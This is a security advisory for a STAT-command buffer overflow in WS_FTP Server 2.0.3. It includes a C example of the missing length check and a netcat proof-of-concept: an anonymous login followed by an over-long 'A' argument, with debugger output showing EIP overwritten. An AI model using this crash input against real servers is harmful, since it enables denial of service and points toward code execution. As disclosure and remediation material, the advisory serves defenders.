WS_FTP Server v2.0.3 Buffer Overflow Vulnerability

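Affected program:
WS_FTP

Description:
A parameter validation error in WS_FTP Server v2.0.3 leads to a buffer overflow

Details:
WS_FTP Server is FTP server software for the Windows platform. Version 2.0.3 contains a buffer overflow vulnerability that may allow a remote attacker to execute arbitrary code.

The cause is that the code which parses the "STAT" command does not validate the length of the user-supplied argument. If an attacker passes an overly long argument to the "STAT" command, a buffer overflow occurs.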
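The length check described above as missing, written as an added C example (not WS_FTP's code, which is not shown on this page). The function name parse_stat, the return codes and the 255-byte limit are assumptions made for illustration; the page does not state the real buffer size.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define STAT_ARG_MAX 255  /* assumed policy limit, not taken from the page */

enum { FTP_OK = 0, FTP_NOT_STAT = -1, FTP_ARG_TOO_LONG = -2 };

/* Parse one FTP command line. If the verb is STAT, copy its argument into
 * out (capacity out_cap) only after the length has been validated. */
int parse_stat(const char *line, char *out, size_t out_cap)
{
    static const char verb[] = "STAT";
    size_t i, len;

    for (i = 0; i < 4; i++)               /* case-insensitive verb match */
        if (toupper((unsigned char)line[i]) != verb[i])
            return FTP_NOT_STAT;
    if (line[4] != '\0' && line[4] != ' ' && line[4] != '\r' && line[4] != '\n')
        return FTP_NOT_STAT;              /* a longer token, not STAT */

    line += 4;
    while (*line == ' ')                  /* skip separator spaces */
        line++;
    len = strcspn(line, "\r\n");          /* argument ends at CR/LF or NUL */

    /* Validate before copying: reject anything over the policy limit or
     * anything that would not fit the destination with its terminator. */
    if (len > STAT_ARG_MAX || len >= out_cap)
        return FTP_ARG_TOO_LONG;          /* caller can reply 501 and log it */

    memcpy(out, line, len);
    out[len] = '\0';
    return FTP_OK;
}

int main(void)
{
    char arg[STAT_ARG_MAX + 1];
    char big[600];                        /* constructed over-long input */

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    memcpy(big, "stat ", 5);

    printf("normal:   %d\n", parse_stat("STAT /pub\r\n", arg, sizeof arg));
    printf("overlong: %d\n", parse_stat(big, arg, sizeof arg));
    return 0;
}
```

Rejected lines are worth logging with the client address, since an over-long STAT argument is not something a normal FTP client sends.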


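The following code is intended only for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.

In the debugger output at the end of the session, eip and ebp both hold 41414141, the ASCII value of the 'A' characters sent as the STAT argument.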


C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA

0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???

Affected systems:
WS_FTP Server v2.0.3